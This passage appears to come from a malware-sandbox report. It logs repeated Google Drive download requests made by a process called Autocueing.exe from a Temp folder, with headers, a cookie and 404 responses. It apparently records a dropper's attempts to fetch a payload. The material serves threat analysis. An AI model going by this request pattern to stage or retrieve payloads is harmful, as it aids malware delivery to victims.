                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-g3Of4dK8-e4ofJK6U6BuKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    47192.168.2.650032142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:56 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:56 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5JyON8aNtOox4u7xav2NZ84Q8nsp5H9-BaLv35dhSk0iulRMLbe4Ez5kv8y2LueJZv
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:56 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-BGOonSUYkufnMVzv9c35tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 4e 38 43 4f 6e 77 41 69 57 54 42 33 48 33 68 62 7a 63 4c 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UN8COnwAiWTB3H3hbzcLFQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    48192.168.2.650033142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:57 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:57 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:57 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-mTo-kavvWeaw0DwKbwCx4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    49192.168.2.650034142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:58 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:59 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQzs32MxJrFS3F9gKWhpEUGzMuNjqOp9QTTGw8MEZswz0d0bRirdZTbkDlf3ppvvASn8lzoGzI
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:58 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Pa1J2QkUsDZKUOWdYX-70w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 37 4a 5f 45 33 50 67 6d 43 6e 64 34 47 6a 2d 50 72 34 79 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z7J_E3PgmCnd4Gj-Pr4yCQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    50192.168.2.650035142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:59 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:00 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:00 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-L_fzmOOI7Hkf5DsCvLRfYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    51192.168.2.650036142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:01 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:01 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTGxi-imLV30YR0MPMeeWzNJqky7yS09xqzaOM3-4fIMSJl52zbbsWtvNePzBB1lMg3
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:01 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-QW5DyroVhUhgbrgA_sTTwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:29:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 51 4b 71 6d 65 39 50 52 39 4b 65 5f 74 37 41 41 69 58 53 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2QKqme9PR9Ke_t7AAiXSsw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    52192.168.2.650037142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:02 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:02 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-UMWuxwwUtOmCdAtxEj4orA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    53192.168.2.650038142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:29:03 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:29:03 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4WnCNcuhRYqGsGQpBrAZ0JQAssf2gN7F90zv_2JFB8_mYHudLBwwahGTNhCDIw6_0HnD1Eddo
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:03 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
